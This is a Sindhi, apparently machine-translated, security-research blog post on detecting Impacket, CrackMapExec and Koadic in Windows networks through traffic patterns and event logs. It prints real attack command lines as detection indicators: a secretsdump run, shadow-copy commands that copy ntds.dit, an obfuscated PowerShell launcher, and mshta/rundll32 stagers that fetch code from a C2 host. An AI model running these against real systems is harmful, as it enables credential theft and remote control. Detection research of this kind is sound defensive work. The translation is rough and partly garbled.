پرو هوسٽر > بلاگ > انتظاميه > ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو

ڪارپوريٽ شعبي ۾ حملن جو تعداد هر سال وڌي رهيو آهي: مثال طور 2017 ۾، 13 سيڪڙو وڌيڪ منفرد واقعا رڪارڊ ڪيا ويا 2016 جي ڀيٽ ۾، ۽ 2018 جي ​​آخر ۾ - 27 سيڪڙو وڌيڪ واقعاگذريل دور جي ڀيٽ ۾. انهن سميت جتي مکيه ڪم ڪندڙ اوزار ونڊوز آپريٽنگ سسٽم آهي. 2017-2018 ۾، APT Dragonfly، APT28، APT MuddyWater يورپ، اتر آمريڪا ۽ سعودي عرب ۾ حڪومتي ۽ فوجي ادارن تي حملا ڪيا. ۽ اسان ان لاءِ ٽي اوزار استعمال ڪيا. امپيڪٽ, ڪرڪ ميپيڪس и ڪوئڊڪ. انهن جو سورس ڪوڊ کليل آهي ۽ GitHub تي دستياب آهي.

اها ڳالهه نوٽ ڪرڻ جي قابل آهي ته اهي اوزار ابتدائي دخول لاء استعمال نه ڪيا ويا آهن، پر انفراسٽرڪچر جي اندر حملي کي وڌائڻ لاء. حملي آور انهن کي حملي جي مختلف مرحلن تي استعمال ڪندا آهن جنهن جي دائري ۾ داخل ٿيڻ کان پوءِ. اهو، رستي جي ذريعي، ڳولڻ ڏکيو آهي ۽ اڪثر ڪري صرف ٽيڪنالاجي جي مدد سان نيٽ ورڪ ٽرئفڪ ۾ سمجھوتي جي نشانين جي سڃاڻپ يا اوزار جيڪي اجازت ڏين ٿا انفراسٽرڪچر ۾ داخل ٿيڻ کان پوءِ حملي آور جي فعال ڪارناما معلوم ڪريو. اوزار مختلف قسم جا ڪم مهيا ڪن ٿا، فائلن کي منتقل ڪرڻ کان وٺي رجسٽري سان رابطو ڪرڻ ۽ ريموٽ مشين تي حڪمن تي عمل ڪرڻ. اسان انهن اوزارن جو مطالعو ڪيو انهن جي نيٽ ورڪ سرگرمي کي طئي ڪرڻ لاءِ.

اسان کي ڇا ڪرڻ جي ضرورت آهي:

  • سمجھو ته هيڪنگ جا اوزار ڪيئن ڪم ڪن ٿا. ڳولهيو ته ڇا حملي آورن کي استحصال ڪرڻ جي ضرورت آهي ۽ ڪهڙيون ٽيڪنالاجيون اهي استعمال ڪري سگهن ٿيون.
  • ڳولھيو جيڪو معلوم نه ڪيو ويو آھي انفارميشن سيڪيورٽي ٽولز پاران حملي جي پھرين مرحلن ۾. ڳولهي وڃڻ واري مرحلي کي ڇڏي سگهجي ٿو، يا ته حملي آور هڪ اندروني حملي آور آهي، يا ڇاڪاڻ ته حملي آور انفراسٽرڪچر ۾ سوراخ جو استحصال ڪري رهيو آهي جيڪو اڳ ۾ معلوم نه هو. اهو ممڪن آهي ته هن جي عملن جي سڄي زنجير کي بحال ڪرڻ، تنهنڪري وڌيڪ حرڪت کي ڳولڻ جي خواهش.
  • مداخلت جي ڳولا واري اوزار مان غلط مثبت کي ختم ڪريو. اسان کي اهو نه وسارڻ گهرجي ته جڏهن ڪجهه ڪارناما اڪيلي سروي جي بنياد تي ڳوليا ويندا آهن، اڪثر غلطيون ممڪن آهن. عام طور تي بنيادي ڍانچي ۾ ڪافي طريقا آهن، ڪنهن به معلومات حاصل ڪرڻ لاء، پهرين نظر ۾ جائز ماڻهن کان الڳ نه ٿي سگهيا آهن.

اهي اوزار ڇا ڏين ٿا حملي آورن کي؟ جيڪڏهن اهو Impacket آهي، ته پوءِ حملي ڪندڙن کي ماڊلز جي هڪ وڏي لائبريري ملي ٿي جيڪا حملي جي مختلف مرحلن تي استعمال ٿي سگهي ٿي جيڪي پردي کي ٽوڙڻ کان پوءِ پيروي ڪندا آهن. ڪيترائي اوزار استعمال ڪن ٿا Impacket ماڊلز اندروني طور تي - مثال طور، Metasploit. اهو آهي dcomexec ۽ wmiexec ريموٽ ڪمانڊ ايگزيڪيوشن لاءِ، ميموري مان اڪائونٽس حاصل ڪرڻ لاءِ secretsdump جيڪي Impacket مان شامل ڪيا ويا آهن. نتيجي طور، اهڙي لائبريري جي سرگرمي جي صحيح پتو لڳائڻ کي يقيني بڻائي سگهندي ڊيريويوٽوز جي ڳولا.

اهو ڪو اتفاق نه آهي ته تخليق ڪندڙن CrackMapExec (يا صرف CME) بابت "Powered by Impacket" لکيو. ان کان علاوه، سي ايم اي وٽ مشهور منظرنامن لاءِ تيار ڪيل ڪارڪردگي آهي: پاسورڊ يا انهن جي هيش حاصل ڪرڻ لاءِ Mimikatz، ريموٽ ايگزيڪيوشن لاءِ ميٽرپريٽر يا ايمپائر ايجنٽ جو عمل، ۽ بورڊ تي Bloodhound.

ٽيون اوزار جيڪو اسان چونڊيو هو ڪوڊڪ. اهو بلڪل تازو آهي، اهو 25 ۾ بين الاقوامي هيڪر ڪانفرنس DEFCON 2017 ۾ پيش ڪيو ويو ۽ هڪ غير معياري طريقي سان نمايان آهي: اهو HTTP، Java Script ۽ Microsoft Visual Basic Script (VBS) ذريعي ڪم ڪري ٿو. هن طريقي کي زمين کان ٻاهر رهڻ سڏيو ويندو آهي: اوزار ونڊوز ۾ ٺهيل انحصار ۽ لائبريرين جو هڪ سيٽ استعمال ڪري ٿو. ٺاهيندڙ ان کي سڏين ٿا COM ڪمانڊ ۽ ڪنٽرول، يا C3.

IMPACKET

Impacket جي ڪارڪردگي تمام وسيع آهي، جيڪا AD جي اندر ڳولها ڪرڻ ۽ اندروني MS SQL سرورز کان ڊيٽا گڏ ڪرڻ کان وٺي، سندون حاصل ڪرڻ جي ٽيڪنڪ تائين آهي: هي هڪ SMB ريلي حملو آهي، ۽ ntds.dit فائل حاصل ڪرڻ جنهن ۾ ڊومين ڪنٽرولر کان صارف جي پاسورڊ جي هيش شامل آهي. Impacket چار مختلف طريقا استعمال ڪندي ريموٽ حڪمن تي عمل ڪري ٿو: WMI، ونڊوز شيڊيولر مئنيجمينٽ سروس، DCOM، ۽ SMB، ۽ ائين ڪرڻ لاءِ سند جي ضرورت آهي.

ڳجهو ڊمپ

اچو ته secretsdump تي هڪ نظر وٺو. ھي ھڪڙو ماڊل آھي جيڪو ھدف ڪري سگھي ٿو ٻئي صارف مشين ۽ ڊومين ڪنٽرولرز. اهو ميموري علائقن LSA، SAM، SECURITY، NTDS.dit جي ڪاپيون حاصل ڪرڻ لاء استعمال ڪري سگهجي ٿو، تنهنڪري ان کي حملي جي مختلف مرحلن تي ڏسي سگهجي ٿو. ماڊل جي آپريشن ۾ پهريون قدم ايس ايم بي جي ذريعي تصديق آهي، جنهن کي يا ته صارف جي پاسورڊ يا ان جي هيش جي ضرورت آهي خودڪار طريقي سان پاس هيش حملي کي انجام ڏيڻ لاء. اڳيون هڪ درخواست اچي ٿي سروس ڪنٽرول مئنيجر (SCM) تائين رسائي کي کولڻ ۽ ونريگ پروٽوڪول ذريعي رجسٽري تائين رسائي حاصل ڪرڻ، جنهن کي استعمال ڪندي هڪ حملو ڪندڙ دلچسپي جي شاخن جي ڊيٽا کي ڳولي ۽ SMB ذريعي نتيجا حاصل ڪري سگهي ٿو.

تصوير ۾. 1 اسان ڏسون ٿا ته ڪيئن صحيح طور تي ونريگ پروٽوڪول استعمال ڪندي، رسائي حاصل ڪئي وئي آهي رجسٽري ڪيچ استعمال ڪندي LSA سان. هن کي ڪرڻ لاء، DCERPC حڪم استعمال ڪريو opcode 15 - OpenKey سان.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 1. Winreg پروٽوڪول استعمال ڪندي هڪ رجسٽري چيڪ کولڻ

اڳيون، جڏهن ڪيئي تائين رسائي حاصل ڪئي ويندي آهي، قيمتون محفوظ ڪيون وينديون آهن SaveKey ڪمانڊ سان opcode 20. Impacket اهو هڪ خاص طريقي سان ڪندو آهي. اهو قدرن کي فائل ۾ محفوظ ڪري ٿو جنهن جو نالو .tmp سان شامل ڪيل 8 بي ترتيب اکرن جو هڪ اسٽرنگ آهي. ان کان علاوه، هن فائل جي وڌيڪ اپ لوڊ ٿئي ٿي SMB ذريعي System32 ڊاريڪٽري (Fig. 2).

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 2. ريموٽ مشين مان رجسٽري چيڪ حاصل ڪرڻ لاءِ اسڪيم

اهو ظاهر ٿئي ٿو ته نيٽ ورڪ تي اهڙي سرگرمي کي ڳولي سگهجي ٿو سوالن جي ذريعي ڪجهه رجسٽري شاخن کي winreg پروٽوڪول استعمال ڪندي، مخصوص نالا، حڪم ۽ انهن جي آرڊر.

هي ماڊل ونڊوز ايونٽ لاگ ۾ نشان به ڇڏي ٿو، ان کي ڳولڻ آسان بڻائي ٿي. مثال طور، حڪم تي عمل ڪرڻ جي نتيجي ۾

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Windows Server 2016 لاگ ۾ اسين واقعن جي ھيٺين اهم ترتيب کي ڏسندا سين:

1. 4624 - ريموٽ لاگ ان.
2. 5145 - winreg ريموٽ سروس تائين رسائي جي حقن جي جانچ ڪندي.
3. 5145 - سسٽم32 ڊاريڪٽري ۾ فائل جي رسائي جي حقن جي جانچ ڪندي. فائل ۾ مٿي ذڪر ڪيل بي ترتيب نالو آهي.
4. 4688 - هڪ cmd.exe عمل ٺاهڻ جيڪو شروع ڪري ٿو vssadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - حڪم سان عمل ٺاهڻ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - حڪم سان عمل ٺاهڻ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - حڪم سان عمل ٺاهڻ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

ڪيترن ئي پوسٽ-استحصال واري اوزار وانگر، Impacket ۾ ماڊلز آهن دور دراز تي عمل ڪرڻ واري حڪمن لاءِ. اسان smbexec تي ڌيان ڏينداسين، جيڪو ريموٽ مشين تي هڪ انٽرويو ڪمانڊ شيل مهيا ڪري ٿو. هي ماڊل ايس ايم بي ذريعي تصديق جي ضرورت آهي، يا ته پاسورڊ يا پاسورڊ هيش سان. تصوير ۾. شڪل 3 ۾ اسان هڪ مثال ڏسون ٿا ته اهڙي اوزار ڪيئن ڪم ڪندو آهي، هن صورت ۾ اهو آهي مقامي منتظم ڪنسول.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 3. انٽرويو smbexec ڪنسول

تصديق ڪرڻ کان پوء smbexec جو پهريون قدم OpenSCManagerW حڪم (15) سان SCM کولڻ آهي. سوال قابل ذڪر آهي: MachineName فيلڊ DUMMY آهي.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 4. سروس ڪنٽرول مئنيجر کولڻ جي درخواست

اڳيون، خدمت ٺاهي وئي آهي CreateServiceW حڪم استعمال ڪندي (12). smbexec جي صورت ۾، اسان هر وقت ساڳيو حڪم تعميراتي منطق ڏسي سگهون ٿا. تصوير ۾. 5 سائو اشارو ڪري ٿو اڻ بدليل ڪمانڊ پيٽرولر، پيلو اشارو ڏئي ٿو ته حملو ڪندڙ ڇا تبديل ڪري سگهي ٿو. اهو ڏسڻ ۾ آسان آهي ته ايگزيڪيوٽيبل فائل جو نالو، ان جي ڊاريڪٽري ۽ آئوٽ پُٽ فائل کي تبديل ڪري سگهجي ٿو، پر باقي تمام گهڻو ڏکيو آهي تبديل ڪرڻ بغير Impacket ماڊل جي منطق کي پريشان ڪرڻ کان.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 5. سروس ڪنٽرول مئنيجر استعمال ڪندي خدمت ٺاهڻ جي درخواست

Smbexec ونڊوز ايونٽ لاگ ۾ واضح نشان پڻ ڇڏي ٿو. ونڊوز سرور 2016 لاگ ان ۾ ipconfig ڪمانڊ سان انٽرايڪٽو ڪمانڊ شيل لاءِ، اسان ڏسنداسين هيٺين اهم واقعن جو سلسلو:

1. 4697 - قرباني جي مشين تي خدمت جي تنصيب:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - نقطي 1 کان دليلن سان cmd.exe عمل جي تخليق.
3. 5145 - C$ ڊاريڪٽري ۾ __output فائل تائين رسائي جي حقن جي جانچ ڪندي.
4. 4697 - قرباني جي مشين تي خدمت جي تنصيب.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - نقطي 4 کان دليلن سان cmd.exe عمل جي تخليق.
6. 5145 - C$ ڊاريڪٽري ۾ __output فائل تائين رسائي جي حقن جي جانچ ڪندي.

Impacket حملي جي اوزار جي ترقي لاء بنياد آهي. اهو ونڊوز انفراسٽرڪچر ۾ لڳ ڀڳ سڀني پروٽوڪول کي سپورٽ ڪري ٿو ۽ ساڳئي وقت ان جون پنهنجون خاصيتون آهن. هتي مخصوص winreg درخواستون آهن، ۽ SCM API جو استعمال خاص ڪمانڊ ٺهڻ سان، ۽ فائل جو نالو فارميٽ، ۽ SMB شيئر SYSTEM32.

CRACKMAPEXEC

سي ايم اي جو اوزار بنيادي طور تي ٺاھيو ويو آھي انھن معمولي عملن کي خودڪار ڪرڻ لاءِ جيڪي ھڪ حملو ڪندڙ کي انجام ڏيڻا پوندا آھن نيٽ ورڪ اندر اڳتي وڌڻ لاءِ. اهو توهان کي مشهور ايمپائر ايجنٽ ۽ ميٽرپريٽر سان گڏ ڪم ڪرڻ جي اجازت ڏئي ٿو. حڪمن تي عمل ڪرڻ لاء ڳجھي طور تي، سي ايم اي انھن کي ختم ڪري سگھي ٿو. استعمال ڪندي Bloodhound (هڪ الڳ ڳجهه اوزار)، هڪ حملو ڪندڙ هڪ فعال ڊومين ايڊمنسٽريٽر سيشن جي ڳولا کي خودڪار ڪري سگهي ٿو.

Bloodhound

بلڊ هائونڊ، هڪ اسٽائل اوزار جي طور تي، نيٽ ورڪ جي اندر ترقي يافته تحقيق جي اجازت ڏئي ٿو. اهو استعمال ڪندڙن، مشينن، گروپن، سيشنن بابت ڊيٽا گڏ ڪري ٿو ۽ هڪ PowerShell اسڪرپٽ يا بائنري فائل طور فراهم ڪيو ويندو آهي. LDAP يا SMB-based پروٽوڪول معلومات گڏ ڪرڻ لاءِ استعمال ٿين ٿا. سي ايم اي انٽيگريشن ماڊل بلڊ هائونڊ کي اجازت ڏئي ٿو ته قرباني جي مشين تي ڊائون لوڊ ڪيو وڃي، گڏ ڪيل ڊيٽا کي هلائڻ ۽ وصول ڪرڻ کان پوءِ، ان ڪري سسٽم ۾ ڪارناما خودڪار ڪري ٿو ۽ انهن کي گهٽ قابل ذڪر بڻائي ٿو. Bloodhound گرافڪ شيل گڏ ڪيل ڊيٽا کي گراف جي صورت ۾ پيش ڪري ٿو، جيڪو توهان کي حملي ڪندڙ مشين کان ڊومين ايڊمنسٽريٽر تائين مختصر رستو ڳولڻ جي اجازت ڏئي ٿو.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 6. Bloodhound انٽرفيس

مقتول جي مشين تي هلائڻ لاء، ماڊل ATSVC ۽ SMB استعمال ڪندي هڪ ڪم ٺاهي ٿو. ATSVC ونڊوز ٽاسڪ شيڊيولر سان ڪم ڪرڻ لاءِ هڪ انٽرفيس آهي. CME استعمال ڪري ٿو NetrJobAdd(1) فنڪشن نيٽ ورڪ تي ڪم ٺاهڻ لاءِ. CME ماڊل ڇا موڪلي ٿو ان جو هڪ مثال تصوير ۾ ڏيکاريل آهي. 7: هي هڪ cmd.exe ڪمانڊ ڪال آهي ۽ ايڪس ايم ايل فارميٽ ۾ آرگيومينٽس جي صورت ۾ مبهم ڪوڊ آهي.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
تصوير 7. CME ذريعي هڪ ڪم ٺاهڻ

ٽاسڪ کي عمل لاءِ پيش ڪرڻ کان پوءِ، مقتول جي مشين پاڻ کي بلڊ هائونڊ شروع ڪري ٿي، ۽ اهو ٽريفڪ ۾ ڏسي سگهجي ٿو. ماڊل معياري گروپن، ڊومين ۾ سڀني مشينن ۽ استعمال ڪندڙن جي هڪ فهرست، ۽ SRVSVC NetSessEnum درخواست ذريعي فعال يوزر سيشن بابت معلومات حاصل ڪرڻ لاءِ LDAP سوالن جي خاصيت آهي.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 8. SMB ذريعي فعال سيشن جي لسٽ حاصل ڪرڻ

ان کان علاوه، بلڊ ھاؤنڊ لانچ ڪرڻ سان گڏ قرباني جي مشين تي آڊيٽنگ کي فعال ڪيو ويو آھي ھڪڙي واقعي سان گڏ ID 4688 (پروسيس ٺاھڻ) ۽ پروسيس جو نالو «C:WindowsSystem32cmd.exe». ان جي باري ۾ ڇا قابل ذڪر آهي حڪم لائن دلائل:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

enum_avproducts ماڊل ڪارڪردگي ۽ عمل درآمد جي نقطي نظر کان تمام دلچسپ آهي. WMI توهان کي اجازت ڏئي ٿو WQL سوال ٻولي استعمال ڪرڻ لاءِ مختلف ونڊوز شين مان ڊيٽا حاصل ڪرڻ لاءِ، جيڪو بنيادي طور اهو آهي جيڪو هي CME ماڊل استعمال ڪري ٿو. اهو سوال پيدا ڪري ٿو AntiSpywareProduct ۽ AntiMirusProduct طبقن کي قرباني جي مشين تي نصب ڪيل حفاظتي اوزار بابت. ضروري ڊيٽا حاصل ڪرڻ لاءِ، ماڊل روٽ سيڪيورٽي سينٽر 2 نالي واري جاءِ سان ڳنڍي ٿو، پوءِ WQL سوال پيدا ڪري ٿو ۽ جواب وصول ڪري ٿو. تصوير ۾. شڪل 9 اهڙين درخواستن ۽ جوابن جو مواد ڏيکاري ٿو. اسان جي مثال ۾، Windows Defender مليو هو.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 9. enum_avproducts ماڊل جي نيٽ ورڪ سرگرمي

گهڻو ڪري، WMI آڊيٽنگ (Trace WMI-Activity)، جن جي واقعن ۾ توهان WQL سوالن جي باري ۾ مفيد معلومات ڳولي سگهو ٿا، غير فعال ٿي سگھي ٿو. پر جيڪڏهن ان کي فعال ڪيو وڃي، ته پوءِ جيڪڏهن enum_avproducts اسڪرپٽ هلايو وڃي ته، ID 11 سان هڪ واقعو محفوظ ڪيو ويندو. ان ۾ صارف جو نالو هوندو جنهن درخواست موڪلي هئي ۽ نالو rootSecurityCenter2 نالي جي جاءِ ۾.

CME ماڊلز مان هر هڪ جا پنهنجا پنهنجا نمونا هئا، پوءِ اهو مخصوص WQL سوالن جو هجي يا ٽاسڪ شيڊيولر ۾ هڪ خاص قسم جي ٽاسڪ جي تخليق هجي جنهن ۾ LDAP ۽ SMB ۾ بلڊ هائونڊ جي مخصوص سرگرمي هجي.

ڪوڊيڪ

Koadic جي هڪ خاص خصوصيت ونڊوز ۾ ٺاهيل جاوا اسڪرپٽ ۽ VBScript ترجمانن جو استعمال آهي. انهي لحاظ سان، اهو زمين جي رجحان جي پيروي ڪري ٿو - اهو آهي، ان ۾ ڪو به خارجي انحصار نه آهي ۽ معياري ونڊوز اوزار استعمال ڪري ٿو. هي مڪمل ڪمانڊ اينڊ ڪنٽرول (CnC) لاءِ هڪ اوزار آهي، ڇاڪاڻ ته انفيڪشن کان پوءِ مشين تي ”امپلانٽ“ نصب ڪيو ويندو آهي، ان کي ڪنٽرول ڪرڻ جي اجازت ڏئي ٿي. اهڙي مشين، Koadic اصطلاح ۾، هڪ "زومبي" سڏيو ويندو آهي. جيڪڏهن مقتول جي پاسي تي مڪمل آپريشن لاءِ ڪافي مراعتون نه آهن، ڪوڊڪ وٽ انهن کي استعمال ڪرڻ جي صلاحيت آهي صارف اڪائونٽ ڪنٽرول بائي پاس (UAC بائي پاس) ٽيڪنالاجي استعمال ڪندي.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 10. ڪوڊيڪ شيل

مقتول کي ڪمانڊ اينڊ ڪنٽرول سرور سان رابطو شروع ڪرڻ گهرجي. هن کي ڪرڻ لاء، هن کي اڳ ۾ تيار ڪيل يو آر آئي سان رابطو ڪرڻ جي ضرورت آهي ۽ اسٽيجرز مان هڪ استعمال ڪندي مکيه ڪوڊيڪ جسم حاصل ڪرڻ جي ضرورت آهي. تصوير ۾. شڪل 11 mshta اسٽيجر لاءِ هڪ مثال ڏيکاري ٿو.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 11. CnC سرور سان سيشن شروع ڪرڻ

جوابي متغير WS جي بنياد تي، اهو واضح ٿئي ٿو ته عمل WScript.Shell ذريعي ٿئي ٿو، ۽ متغير STAGER، SESSIONKEY، JOBKEY، JOBKEYPATH، EXPIRE موجوده سيشن جي پيرا ميٽرن بابت اهم معلومات تي مشتمل آهي. هي هڪ CnC سرور سان HTTP ڪنيڪشن ۾ پهريون درخواست-جواب جوڙو آهي. بعد ۾ درخواستون سڌو سنئون ماڊلز (امپلانٽس) جي ڪارڪردگي سان لاڳاپيل آهن. سڀ Koadic ماڊلز صرف CnC سان هڪ فعال سيشن سان ڪم.

ممڪنڪ

جيئن سي ايم اي ڪم ڪري ٿو Bloodhound سان، Koadic ڪم ڪري ٿو Mimikatz سان هڪ الڳ پروگرام ۽ ان کي لانچ ڪرڻ جا ڪيترائي طريقا آهن. هيٺ ڏنل آهي هڪ درخواست-جواب جوڙو ڊائون لوڊ ڪرڻ لاءِ Mimikatz امپلانٽ.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 12. Mimikatz کي Koadic ڏانهن منتقل ڪريو

توھان ڏسي سگھوٿا درخواست ۾ URI فارميٽ ڪيئن بدلجي ويو آھي. اهو هاڻي csrf متغير جي قيمت تي مشتمل آهي، جيڪو منتخب ٿيل ماڊل لاء ذميوار آهي. هن جي نالي تي ڌيان نه ڏيو؛ اسان سڀ ڄاڻون ٿا ته CSRF عام طور تي مختلف طور تي سمجهي ويندي آهي. جواب Koadic جو ساڳيو مکيه جسم هو، جنهن ۾ Mimikatz سان لاڳاپيل ڪوڊ شامل ڪيو ويو. اهو ڪافي وڏو آهي، تنهنڪري اچو ته اهم نقطي نظر اچن. هتي اسان وٽ آهي Mimikatz لائبريري بنيادي 64 ۾ انڪوڊ ٿيل، هڪ سيريل ٿيل .NET ڪلاس جيڪو ان کي انجيڪشن ڪندو، ۽ Mimikatz لانچ ڪرڻ لاءِ دليل. عمل جو نتيجو واضح متن ۾ نيٽ ورڪ تي منتقل ڪيو ويو آهي.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 13. ريموٽ مشين تي Mimikatz هلائڻ جو نتيجو

Exec_cmd

Koadic پڻ ماڊلز آهن جيڪي حڪمن تي عمل ڪري سگھن ٿيون. هتي اسان ڏسنداسين ساڳيو URI نسل جو طريقو ۽ واقف sid ۽ csrf متغير. exec_cmd ماڊل جي صورت ۾، ڪوڊ جسم ۾ شامل ڪيو ويو آھي جيڪو شيل حڪمن تي عمل ڪرڻ جي قابل آھي. هيٺ ڏيکاريل آهي اهڙو ڪوڊ CnC سرور جي HTTP جواب ۾ موجود آهي.

ونڊوز انفراسٽرڪچر تي حملن کي ڪيئن معلوم ڪجي: هيڪر ٽولز جو مطالعو
چانور. 14. امپلانٽ ڪوڊ exec_cmd

GAWTUUGCFI variable واقف WS وصف سان گڏ ڪوڊ جي عمل لاءِ گھربل آھي. ان جي مدد سان، امپلانٽ شيل کي سڏيندو آهي، ڪوڊ جي ٻن شاخن کي پروسيسنگ ڪري ٿو - shell.exec بغير واپسي جي ڊيٽا جي وهڪرو ۽ shell.run جي واپسي سان.

Koadic هڪ عام اوزار نه آهي، پر ان جي پنهنجي نموني آهي جنهن جي ذريعي اهو جائز ٽرئفڪ ۾ ڳولي سگهجي ٿو:

  • HTTP درخواستن جي خاص ٺهڻ،
  • winHttpRequests API استعمال ڪندي،
  • ActiveXObject ذريعي WScript.Shell اعتراض ٺاهڻ،
  • وڏي executable جسم.

شروعاتي ڪنيڪشن اسٽيجر طرفان شروع ڪئي وئي آهي، تنهنڪري اهو ممڪن آهي ته ان جي سرگرمي کي ونڊوز واقعن ذريعي ڳولڻ ممڪن آهي. mshta لاءِ، هي واقعو 4688 آهي، جيڪو ظاهر ڪري ٿو هڪ عمل جي پيدائش جي شروعات واري خاصيت سان:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

جڏهن ڪوڊيڪ هلائي رهيو آهي، توهان ٻين 4688 واقعن کي ڏسي سگهو ٿا خاصيتن سان جيڪي مڪمل طور تي ان جي خاصيت ڪن ٿا:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

پهچڻ

زمين کان ٻاهر رهڻ جو رجحان ڏوهن جي وچ ۾ مقبوليت حاصل ڪري رهيو آهي. اهي پنهنجي ضرورتن لاءِ ونڊوز ۾ ٺاهيل اوزار ۽ ميکانيزم استعمال ڪندا آهن. اسان ڏسي رهيا آهيون مشهور اوزار Koadic، CrackMapExec ۽ Impacket هن اصول تي عمل ڪندي APT رپورٽن ۾ وڌ ۾ وڌ ظاهر ٿيندا آهن. انهن اوزارن لاءِ GitHub تي فورڪس جو تعداد پڻ وڌي رهيو آهي، ۽ نوان ظاهر ٿي رهيا آهن (هاڻي انهن مان اٽڪل هڪ هزار آهن). رجحان مقبوليت حاصل ڪري رهيو آهي ان جي سادگي جي ڪري: حملي ڪندڙن کي ٽئين پارٽي جي اوزار جي ضرورت ناهي؛ اهي پهريان ئي متاثرين جي مشين تي آهن ۽ انهن کي حفاظتي قدمن کي نظرانداز ڪرڻ ۾ مدد ڪن ٿا. اسان نيٽ ورڪ ڪميونيڪيشن جي مطالعي تي ڌيان ڏيون ٿا: مٿي بيان ڪيل هر ٽول نيٽ ورڪ ٽرئفڪ ۾ پنهنجا پنهنجا نشان ڇڏي ٿو. انهن جي تفصيلي مطالعي اسان کي اسان جي پيداوار سيکارڻ جي اجازت ڏني پي ٽي نيٽ ورڪ حملي جي دريافت انهن کي ڳوليو، جيڪو آخرڪار انهن ۾ شامل ٿيندڙ سائبر واقعن جي پوري سلسلي جي تحقيق ڪرڻ ۾ مدد ڪري ٿو.

ليکڪ:

  • Anton Tyurin، ماهر سروسز ڊپارٽمينٽ جو سربراهه، پي ٽي ماهر سيڪيورٽي سينٽر، مثبت ٽيڪنالاجيز
  • Egor Podmokov، ماهر، پي ٽي ماهر سيڪيورٽي سينٽر، مثبت ٽيڪنالاجيز

جو ذريعو: www.habr.com

تبصرو شامل ڪريو